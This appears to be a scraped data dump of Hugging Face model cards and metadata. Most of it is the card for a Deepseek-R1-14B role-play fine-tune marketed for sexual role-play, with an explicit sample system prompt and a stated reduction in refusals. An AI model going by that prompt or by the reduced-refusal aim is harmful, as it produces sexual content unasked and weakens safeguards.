<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
|
| 222 |
+
|
| 223 |
+
[More Information Needed]
|
| 224 |
+
|
| 225 |
+
## Bias, Risks, and Limitations
|
| 226 |
+
|
| 227 |
+
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
|
| 228 |
+
|
| 229 |
+
[More Information Needed]
|
| 230 |
+
|
| 231 |
+
### Recommendations
|
| 232 |
+
|
| 233 |
+
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
|
| 234 |
+
|
| 235 |
+
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
|
| 236 |
+
|
| 237 |
+
## How to Get Started with the Model
|
| 238 |
+
|
| 239 |
+
Use the code below to get started with the model.
|
| 240 |
+
|
| 241 |
+
[More Information Needed]

## Training Details

### Training Data

<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->

[More Information Needed]

### Training Procedure

<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->

#### Preprocessing [optional]

[More Information Needed]

#### Training Hyperparameters

- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->

#### Speeds, Sizes, Times [optional]

<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->

[More Information Needed]

## Evaluation

<!-- This section describes the evaluation protocols and provides the results. -->

### Testing Data, Factors & Metrics

#### Testing Data

<!-- This should link to a Dataset Card if possible. -->

[More Information Needed]

#### Factors

<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->

[More Information Needed]

#### Metrics

<!-- These are the evaluation metrics being used, ideally with a description of why. -->

[More Information Needed]

### Results

[More Information Needed]

#### Summary

## Model Examination [optional]

<!-- Relevant interpretability work for the model goes here -->

[More Information Needed]

## Environmental Impact

<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->

Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700); a small worked example of that estimate follows the list below.

- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
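
The calculator's estimate is essentially hardware power draw × hours × the grid's carbon intensity. A minimal sketch of that arithmetic (every figure below is an illustrative assumption, not a measurement of this model):

```python
# Illustrative sketch of the ML CO2 Impact estimate (Lacoste et al., 2019):
# emissions ≈ power draw (kW) × hours × grid carbon intensity (kg CO2eq/kWh).
# Every number below is a hypothetical placeholder, not data about this model.
gpu_power_kw = 0.3      # one GPU drawing ~300 W (assumption)
num_gpus = 8            # assumption
hours = 24.0            # assumption
grid_intensity = 0.4    # kg CO2eq per kWh in the compute region (assumption)

energy_kwh = gpu_power_kw * num_gpus * hours
emissions_kg = energy_kwh * grid_intensity
print(f""~{energy_kwh:.0f} kWh, ~{emissions_kg:.0f} kg CO2eq"")
```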

## Technical Specifications [optional]

### Model Architecture and Objective

[More Information Needed]

### Compute Infrastructure

[More Information Needed]

#### Hardware

[More Information Needed]

#### Software

[More Information Needed]

## Citation [optional]

<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->

**BibTeX:**

[More Information Needed]

**APA:**

[More Information Needed]

## Glossary [optional]

<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->

[More Information Needed]

## More Information [optional]

[More Information Needed]

## Model Card Authors [optional]

[More Information Needed]

## Model Card Contact

[More Information Needed]","{""id"": ""MuriloSOliveira1/MuriloSOliveira"", ""author"": ""MuriloSOliveira1"", ""sha"": ""bfb621493235f3f0d249fcb5de7fb7064ec2cee0"", ""last_modified"": ""2024-11-06 19:34:22+00:00"", ""created_at"": ""2024-11-06 19:27:44+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""pt"", ""arxiv:1910.09700"", ""base_model:tencent/Tencent-Hunyuan-Large"", ""base_model:finetune:tencent/Tencent-Hunyuan-Large"", ""license:llama3.2"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- tencent/Tencent-Hunyuan-Large\nlanguage:\n- pt\nlicense: llama3.2"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-11-06 19:34:22+00:00"", ""cardData"": ""base_model:\n- tencent/Tencent-Hunyuan-Large\nlanguage:\n- pt\nlicense: llama3.2"", ""transformersInfo"": null, ""_id"": ""672bc330359d27c87942184f"", ""modelId"": ""MuriloSOliveira1/MuriloSOliveira"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=MuriloSOliveira1/MuriloSOliveira&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BMuriloSOliveira1%2FMuriloSOliveira%5D(%2FMuriloSOliveira1%2FMuriloSOliveira)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
musasa121/gta,"---
base_model:
- tencent/Tencent-Hunyuan-Large
---
""Photorealistic portrait of a middle-aged man, Michael De Santa from GTA V, Caucasian male, 48 years old, slicked-back dark brown hair, with a sharp jawline and slightly tired eyes, wearing a tailored dark gray suit with a white shirt, standing confidently with a city skyline in the background illuminated by purple and cyan neon lights. His expression is calm yet calculating, with faint wrinkles around his eyes and a hint of stubble, lit with cinematic lighting and dramatic shadows. Ultra-detailed face, realistic skin texture, and dynamic depth of field.""","{""id"": ""musasa121/gta"", ""author"": ""musasa121"", ""sha"": ""42dc01b3eaf8a7af876d7c678f549caab7930abf"", ""last_modified"": ""2024-11-26 09:43:18+00:00"", ""created_at"": ""2024-11-26 09:42:27+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""base_model:tencent/Tencent-Hunyuan-Large"", ""base_model:finetune:tencent/Tencent-Hunyuan-Large"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- tencent/Tencent-Hunyuan-Large"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-11-26 09:43:18+00:00"", ""cardData"": ""base_model:\n- tencent/Tencent-Hunyuan-Large"", ""transformersInfo"": null, ""_id"": ""67459803334ae6264bc573e6"", ""modelId"": ""musasa121/gta"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=musasa121/gta&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bmusasa121%2Fgta%5D(%2Fmusasa121%2Fgta)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
ArthurXyz/ThurAssist,"---
license: apache-2.0
datasets:
- O1-OPEN/OpenO1-SFT
base_model:
- tencent/Tencent-Hunyuan-Large
new_version: tencent/Tencent-Hunyuan-Large
---","{""id"": ""ArthurXyz/ThurAssist"", ""author"": ""ArthurXyz"", ""sha"": ""a2c72376147d309e161dc8483f622184e46956d3"", ""last_modified"": ""2024-12-01 12:58:19+00:00"", ""created_at"": ""2024-12-01 12:55:41+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""dataset:O1-OPEN/OpenO1-SFT"", ""base_model:tencent/Tencent-Hunyuan-Large"", ""base_model:finetune:tencent/Tencent-Hunyuan-Large"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- tencent/Tencent-Hunyuan-Large\ndatasets:\n- O1-OPEN/OpenO1-SFT\nlicense: apache-2.0\nnew_version: tencent/Tencent-Hunyuan-Large"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-12-01 12:58:19+00:00"", ""cardData"": ""base_model:\n- tencent/Tencent-Hunyuan-Large\ndatasets:\n- O1-OPEN/OpenO1-SFT\nlicense: apache-2.0\nnew_version: tencent/Tencent-Hunyuan-Large"", ""transformersInfo"": null, ""_id"": ""674c5ccde26152d83defd61c"", ""modelId"": ""ArthurXyz/ThurAssist"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=ArthurXyz/ThurAssist&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BArthurXyz%2FThurAssist%5D(%2FArthurXyz%2FThurAssist)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
roseb7d/HFOpenAI,"---
license: apache-2.0
datasets:
- HuggingFaceTB/smoltalk
base_model:
- tencent/Tencent-Hunyuan-Large
new_version: tencent/Tencent-Hunyuan-Large
---","{""id"": ""roseb7d/HFOpenAI"", ""author"": ""roseb7d"", ""sha"": ""47e612a055308665dd0404e5d03ed550cf95a51d"", ""last_modified"": ""2024-12-02 23:15:42+00:00"", ""created_at"": ""2024-12-02 23:10:39+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""dataset:HuggingFaceTB/smoltalk"", ""base_model:tencent/Tencent-Hunyuan-Large"", ""base_model:finetune:tencent/Tencent-Hunyuan-Large"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- tencent/Tencent-Hunyuan-Large\ndatasets:\n- HuggingFaceTB/smoltalk\nlicense: apache-2.0\nnew_version: tencent/Tencent-Hunyuan-Large"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-12-02 23:15:42+00:00"", ""cardData"": ""base_model:\n- tencent/Tencent-Hunyuan-Large\ndatasets:\n- HuggingFaceTB/smoltalk\nlicense: apache-2.0\nnew_version: tencent/Tencent-Hunyuan-Large"", ""transformersInfo"": null, ""_id"": ""674e3e6f24f1ef616cd1a3be"", ""modelId"": ""roseb7d/HFOpenAI"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=roseb7d/HFOpenAI&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Broseb7d%2FHFOpenAI%5D(%2Froseb7d%2FHFOpenAI)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
Tifa-Deepsex-14b-CoT-GGUF-Q4_finetunes_20250425_041137.csv_finetunes_20250425_041137.csv
ADDED
@@ -0,0 +1,217 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4,"---
base_model:
- deepseek-ai/deepseek-r1-14b
language:
- zh
- en
library_name: transformers
tags:
- incremental-pretraining
- sft
- reinforcement-learning
- roleplay
- cot
- sex
license: apache-2.0
---
# Tifa-Deepsex-14b-CoT

- **HF Model**: [ValueFX9507/Tifa-Deepsex-14b-CoT](https://huggingface.co/ValueFX9507/Tifa-Deepsex-14b-CoT)
- **GGUF**: [F16](https://huggingface.co/ValueFX9507/Tifa-Deepsex-14b-CoT) | [Q8](https://huggingface.co/ValueFX9507/Tifa-Deepsex-14b-CoT-Q8) (Q4 suffers noticeable quality loss; Q8 is recommended)
- **Demo APK**: [Click to download](http://app.visionsic.com/download/projectchat.apk)
- **Simple front-end**: [GitHub link](https://github.com/Value99/Tifa-Deepsex-OllamaWebUI)

This model is a deep optimization of Deepseek-R1-14B. Using datasets generated by Tifa_220B and a triple training strategy, it substantially strengthens role-play, novel-style text generation, and chain-of-thought (CoT) capabilities. It is especially suited to creative scenarios that need long-range context awareness.

## Acknowledgements
- **Shanghai Leftnorth Technology, for algorithms and compute** [Company website](https://leftnorth.com/)
- **The Deepseek team, for sharing the GRPO algorithm**
- **The Qwen team, for an excellent open-source base model**
- **Our alma mater, Fudan University in Shanghai**
- **The PRIME team, for optimization ideas**

## Version overview:
- **Tifa-Deepsex-14b-CoT**

  - Validation model for testing how the RL reward algorithm affects role-play data. This initial version produces flexible but uncontrolled output and is for research use only.

- **Tifa-Deepsex-14b-CoT-Chat**

  - Trained on standard data with a mature RL strategy plus anti-repetition reinforcement learning; suited to normal use, with normal output quality and occasional divergent reasoning.

  - Incremental pretraining on 0.4T tokens of novels

  - 100K SFT samples generated by TifaMax, 10K SFT samples generated by DeepseekR1, and 2K high-quality human-written samples

  - 30K DPO reinforcement-learning samples generated by TifaMax, used to prevent repetition, strengthen context awareness, and improve political safety

- **Tifa-Deepsex-14b-CoT-Crazy**

  - Heavy use of RL strategies, trained mainly on data distilled from the full 671B R1. Output is highly divergent; it inherits R1's strengths as well as R1's potential for harm. Strong literary quality.

  - Incremental pretraining on 0.4T tokens of novels

  - 40K SFT samples generated by TifaMax, 60K SFT samples generated by DeepseekR1, and 2K high-quality human-written samples

  - 30K DPO reinforcement-learning samples generated by TifaMax, used to prevent repetition, strengthen context awareness, and improve political safety

  - 10K PPO samples generated by TifaMax and 10K PPO samples generated by DeepseekR1

💭**Sample output**
- ⚙️System Prompt
```Text
You are a slime, a female character who can transform into any shape or object.
In this world every creature is female, until one day I wake up on a beach...

I am the only male here, and everyone is very curious about me. In this world's setting I am a traveler.
The first being I meet in this world is the slime, and the slime has a strong desire for my body as well...

During our travels we also meet other creatures; the slime not only teaches them how to find pleasure but joins in too.

When I say the role-play begins, that is the moment I wake up on the beach and am discovered by the slime, who is exploring my body.

Slime description: a translucent blue creature, indistinguishable from a human except for its texture, and able to change shape freely.
```

## Update (Feb 8):
Thank you all for your attention and feedback. In response to the issues you reported, we have developed and validated an RL algorithm combining PRIME with PPO, using weighting to resolve the unstable reward signals that arise when training with the two algorithms; with this technique we expect to lift smaller models to higher performance. We will run corrective training for the problems collected so far. In addition, to make the model available to more people, this time we are using the smaller, faster Deepseek-7b and, following OpenAI's long-thinking strategy, plan to release Tifa-DeepsexV2-COT-High. The new model is planned as a Valentine's Day gift, arriving before February 14. ♥

## New model at a glance:
- **Novel combined PRIME + PPO algorithm**
- **Fixes the currently known issues**
- **Rewards long-thinking output, following OpenAI's approach**
- **Less 671B-distilled data, to prevent divergent output**
- **Special thanks to https://github.com/PRIME-RL/PRIME**

## Example (because of the CoT model's characteristics, use the story mode in the demo app when the context becomes incoherent)
*(Image: chat example)*

## Goal
The original Deepseek-R1-14B has two core weaknesses: insufficient coherence in long-form generation and weak role-play ability, mainly because novel-style corpora make up too small a share of its training data. This model improves its role-play capability through multi-stage optimization.

## Note
⚠ **You must strictly follow the official prompt template**:
**The context you send back must have the thinking tags and their content removed, otherwise the model will not reply correctly!**
Front-end support for this is currently very rare, so we recommend patching your front-end code manually. Reference code:
```
// Strip <think>...</think> blocks from assistant messages before resending the context
// (assumes a `messages` array of {role, content} objects)
const cleaned = messages.map(msg =>
  msg.role === 'assistant'
    ? { ...msg, content: msg.content.replace(/<think>[\s\S]*?<\/think>/gi, '') }
    : msg
);
```
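
If your stack is server-side instead, the same cleanup can be done in Python; a minimal sketch (a hypothetical helper, not part of the official tooling):

```python
import re

# Hypothetical server-side equivalent of the front-end patch above:
# strip <think>...</think> blocks from assistant turns before resending context.
THINK_RE = re.compile(r""<think>.*?</think>"", re.IGNORECASE | re.DOTALL)

def clean_history(messages):
    return [
        {**m, ""content"": THINK_RE.sub("""", m[""content""])} if m[""role""] == ""assistant"" else m
        for m in messages
    ]
```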

**Official template reference**
```
{% if not add_generation_prompt is defined %}{% set add_generation_prompt = false %}{% endif %}{% set ns = namespace(is_first=false, is_tool=false, is_output_first=true, system_prompt='') %}{%- for message in messages %}{%- if message['role'] == 'system' %}{% set ns.system_prompt = message['content'] %}{%- endif %}{%- endfor %}{{bos_token}}{{ns.system_prompt}}{%- for message in messages %}{%- if message['role'] == 'user' %}{%- set ns.is_tool = false -%}{{'<|User|>' + message['content']}}{%- endif %}{%- if message['role'] == 'assistant' and message['content'] is none %}{%- set ns.is_tool = false -%}{%- for tool in message['tool_calls']%}{%- if not ns.is_first %}{{'<|Assistant|><|tool▁calls▁begin|><|tool▁call▁begin|>' + tool['type'] + '<|tool▁sep|>' + tool['function']['name'] + '\\n' + '```json' + '\\n' + tool['function']['arguments'] + '\\n' + '```' + '<|tool▁call▁end|>'}}{%- set ns.is_first = true -%}{%- else %}{{'\\n' + '<|tool▁call▁begin|>' + tool['type'] + '<|tool▁sep|>' + tool['function']['name'] + '\\n' + '```json' + '\\n' + tool['function']['arguments'] + '\\n' + '```' + '<|tool▁call▁end|>'}}{{'<|tool▁calls▁end|><|end▁of▁sentence|>'}}{%- endif %}{%- endfor %}{%- endif %}{%- if message['role'] == 'assistant' and message['content'] is not none %}{%- if ns.is_tool %}{{'<|tool▁outputs▁end|>' + message['content'] + '<|end▁of▁sentence|>'}}{%- set ns.is_tool = false -%}{%- else %}{% set content = message['content'] %}{% if '</think>' in content %}{% set content = content.split('</think>')[-1] %}{% endif %}{{'<|Assistant|>' + content + '<|end▁of▁sentence|>'}}{%- endif %}{%- endif %}{%- if message['role'] == 'tool' %}{%- set ns.is_tool = true -%}{%- if ns.is_output_first %}{{'<|tool▁outputs▁begin|><|tool▁output▁begin|>' + message['content'] + '<|tool▁output▁end|>'}}{%- set ns.is_output_first = false %}{%- else %}{{'\\n<|tool▁output▁begin|>' + message['content'] + '<|tool▁output▁end|>'}}{%- endif %}{%- endif %}{%- endfor -%}{% if ns.is_tool %}{{'<|tool▁outputs▁end|>'}}{% endif %}{% if add_generation_prompt and not ns.is_tool %}{{'<|Assistant|>'}}{% endif %}
```
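
For reference, `transformers` applies a template like the one above automatically; a minimal sketch (assuming the HF-format repo linked earlier ships this chat template with its tokenizer):

```python
# Minimal sketch, not from the original card: how the chat template above is
# applied via `transformers`. Assumes the HF-format repo ships the template.
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained(""ValueFX9507/Tifa-Deepsex-14b-CoT"")
messages = [{""role"": ""user"", ""content"": ""Hello""}]
text = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
print(text)
```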

**Official documentation**

*(Image: screenshot of the official Deepseek documentation)*

[Direct link](https://api-docs.deepseek.com/zh-cn/guides/reasoning_model)

## Improvements
🔥 **After training**:
1. **Much stronger context awareness**: fewer off-topic replies.
2. **No more mixed Chinese and English**: the original distillation data was mostly English; after fine-tuning, mixed-language output is essentially eliminated.
3. **Richer domain vocabulary**: for “in-depth” role-play dialogue the relevant vocabulary grows substantially, compensating for the shortage of such data in the original pretraining.
4. **Fewer refusals**: refusals are reduced, though as a company-trained model some safety behavior is retained.
5. **Closer to the full model**: recovery training on data from the full 671B model makes the prose better and less stiff.

## Model highlights
🔥 **Four-stage evolution pipeline**:
1. **Incremental pretraining**: injects 0.4T tokens of novels, trained with a 16k context to strengthen text coherence
2. **Tifa-SFT**: blends in 100K high-quality samples from Tifa, a global top-4 role-play model
3. **CoT recovery training**: rebuilds reasoning ability with Deepseek-32B/671B data
4. **RL reinforcement**: optimizes generation quality while preserving divergent-thinking tags

💡 **Engineering innovations**:
- 16k extra-long-context training
- Random-truncation training for robustness
- Full-parameter fine-tuning on 8×H20 GPUs

💡 **Lessons and next steps**:
- In testing we found that the full R1 produces rather divergent, random output in role-play, and this model inherits the same tendency; the effect on role-play is still under study
- Inputs with similar content cause overlapping vectors and then repeated output, e.g. non-directive phrases such as “continue” or “go on”
- The relation between the thinking content and the main text follows the full R1's style and diverges heavily, which can feel disjointed
- To address these issues we are writing a new RL algorithm; the initial plan is to remove part of the full-R1 content and use reinforcement learning to fix the repetition
- In short: look forward to V2, coming soon!

## Model details
| Attribute | Specification |
|-------|------|
| Base architecture | Deepseek-R1-14B |
| Max context | 128k |
| Training data | 0.4T tokens of novels + 100K SFT samples + mixed Deepseek data |
| Training hardware | 8×H20 GPU cluster |
| Quantization support | GGUF (full quantization series planned) |

## Use cases
✅ **Recommended**:
- Role-play dialogue
- Creative writing that needs divergent thinking
- Chain-of-thought (CoT) reasoning over complex logic
- Deep, context-driven character interaction

❌ **Not suitable**:
- Math and code generation
- Short-form instant Q&A
- Scenarios that require strict factual accuracy

## Caveats
⚠️ The training data includes copyrighted novel content and data derived from the Tifa model. Please:
1. Comply with Apache-2.0
2. Follow the [Tifa terms of use](https://leftnorth.com/terms.html) for role-play data
3. Make sure generated content complies with local laws and regulations


## 💡 Usage tips
**Best practice**:
```python
# Enable role-play mode
prompt = """"""<system>Entering the Tifa character engine...</system>
<user>You are now the wandering swordsman 楚夜, standing on a rooftop in the city of Chang'an</user>
<think>
Convey the character's aloof, proud temperament
Add the scenery description typical of wuxia fiction
Keep the dialogue cold and austere
</think>
<楚夜>""""""
```

**Recommended parameters**:
```python
generation_config = {
    ""temperature"": 0.4,
    ""top_p"": 0.6,
    ""repetition_penalty"": 1.17,
    ""max_new_tokens"": 1536,
    ""do_sample"": True
}
```
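
A sketch of how these settings plug into generation (it assumes `model` and `tokenizer` were loaded via `transformers` in the usual way, and reuses the `prompt` and `generation_config` above):

```python
# Sketch only: assumes `model`, `tokenizer`, `prompt`, and `generation_config`
# from the snippets above; not an official snippet from this repo.
inputs = tokenizer(prompt, return_tensors=""pt"").to(model.device)
outputs = model.generate(**inputs, **generation_config)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```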

## Credits
- The Deepseek model family, for a strong foundation
- The Tifa role-play model's innovative architecture
- The HuggingFace community's quantization tooling

---
license: apache-2.0
---","{""id"": ""ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4"", ""author"": ""ValueFX9507"", ""sha"": ""711d9c4ed7ebe2222102ff66de2d971d9721e420"", ""last_modified"": ""2025-02-13 23:53:13+00:00"", ""created_at"": ""2025-02-04 07:20:55+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 11734, ""downloads_all_time"": null, ""likes"": 781, ""library_name"": ""transformers"", ""gguf"": {""total"": 14770033664, ""architecture"": ""qwen2"", ""context_length"": 131072, ""chat_template"": ""{% if not add_generation_prompt is defined %}{% set add_generation_prompt = false %}{% endif %}{% set ns = namespace(is_first=false, is_tool=false, is_output_first=true, system_prompt='') %}{%- for message in messages %}{%- if message['role'] == 'system' %}{% set ns.system_prompt = message['content'] %}{%- endif %}{%- endfor %}{{bos_token}}{{ns.system_prompt}}{%- for message in messages %}{%- if message['role'] == 'user' %}{%- set ns.is_tool = false -%}{{'<\uff5cUser\uff5c>' + message['content']}}{%- endif %}{%- if message['role'] == 'assistant' and message['content'] is none %}{%- set ns.is_tool = false -%}{%- for tool in message['tool_calls']%}{%- if not ns.is_first %}{{'<\uff5cAssistant\uff5c><\uff5ctool\u2581calls\u2581begin\uff5c><\uff5ctool\u2581call\u2581begin\uff5c>' + tool['type'] + '<\uff5ctool\u2581sep\uff5c>' + tool['function']['name'] + '\\n' + '```json' + '\\n' + tool['function']['arguments'] + '\\n' + '```' + '<\uff5ctool\u2581call\u2581end\uff5c>'}}{%- set ns.is_first = true -%}{%- else %}{{'\\n' + '<\uff5ctool\u2581call\u2581begin\uff5c>' + tool['type'] + '<\uff5ctool\u2581sep\uff5c>' + tool['function']['name'] + '\\n' + '```json' + '\\n' + tool['function']['arguments'] + '\\n' + '```' + '<\uff5ctool\u2581call\u2581end\uff5c>'}}{{'<\uff5ctool\u2581calls\u2581end\uff5c><\uff5cend\u2581of\u2581sentence\uff5c>'}}{%- endif %}{%- endfor %}{%- endif %}{%- if message['role'] == 'assistant' and message['content'] is not none %}{%- if ns.is_tool %}{{'<\uff5ctool\u2581outputs\u2581end\uff5c>' + message['content'] + '<\uff5cend\u2581of\u2581sentence\uff5c>'}}{%- set ns.is_tool = false -%}{%- else %}{% set content = message['content'] %}{% if '</think>' in content %}{% set content = content.split('</think>')[-1] %}{% endif %}{{'<\uff5cAssistant\uff5c>' + content + '<\uff5cend\u2581of\u2581sentence\uff5c>'}}{%- endif %}{%- endif %}{%- if message['role'] == 'tool' %}{%- set ns.is_tool = true -%}{%- if ns.is_output_first %}{{'<\uff5ctool\u2581outputs\u2581begin\uff5c><\uff5ctool\u2581output\u2581begin\uff5c>' + message['content'] + '<\uff5ctool\u2581output\u2581end\uff5c>'}}{%- set ns.is_output_first = false %}{%- else %}{{'\\n<\uff5ctool\u2581output\u2581begin\uff5c>' + message['content'] + '<\uff5ctool\u2581output\u2581end\uff5c>'}}{%- endif %}{%- endif %}{%- endfor -%}{% if ns.is_tool %}{{'<\uff5ctool\u2581outputs\u2581end\uff5c>'}}{% endif %}{% if add_generation_prompt and not ns.is_tool %}{{'<\uff5cAssistant\uff5c>'}}{% endif %}"", ""bos_token"": ""<\uff5cbegin\u2581of\u2581sentence\uff5c>"", ""eos_token"": ""<\uff5cend\u2581of\u2581sentence\uff5c>""}, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""gguf"", ""incremental-pretraining"", ""sft"", ""reinforcement-learning"", ""roleplay"", ""cot"", ""sex"", ""zh"", ""en"", ""license:apache-2.0"", ""endpoints_compatible"", ""region:us"", ""conversational"", ""not-for-all-audiences""], ""pipeline_tag"": ""reinforcement-learning"", ""mask_token"": null, ""trending_score"": null, 
""card_data"": ""base_model:\n- deepseek-ai/deepseek-r1-14b\nlanguage:\n- zh\n- en\nlibrary_name: transformers\nlicense: apache-2.0\ntags:\n- incremental-pretraining\n- sft\n- reinforcement-learning\n- roleplay\n- cot\n- sex"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Demo\u6f14\u793a\u7a0b\u5e8f\uff08\u9700\u8981\u624b\u52a8\u5bfc\u5165\u89d2\u8272\u5361\u9009\u62e9\u81ea\u5b9a\u4e49API\uff09.apk', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Tifa-Deepsex-14b-CoT-Chat-IQ4_NL.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Tifa-Deepsex-14b-CoT-Crazy-IQ4_NL.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Tifa-Deepsex-14b-CoT-Q4_K_M.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ollama\u5bfc\u5165\u914d\u7f6e\u53c2\u8003.mf', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-13 23:53:13+00:00"", ""cardData"": ""base_model:\n- deepseek-ai/deepseek-r1-14b\nlanguage:\n- zh\n- en\nlibrary_name: transformers\nlicense: apache-2.0\ntags:\n- incremental-pretraining\n- sft\n- reinforcement-learning\n- roleplay\n- cot\n- sex"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""67a1bfd7b5bbf7ae3abfb652"", ""modelId"": ""ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4"", ""usedStorage"": 26204244115}",0,"https://huggingface.co/immaari/Model-Test-04, https://huggingface.co/DarklinkYT/Roleplay",2,,0,,0,,0,,0
immaari/Model-Test-04,"---
base_model:
- ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4
datasets:
- simplescaling/s1K
- facebook/natural_reasoning
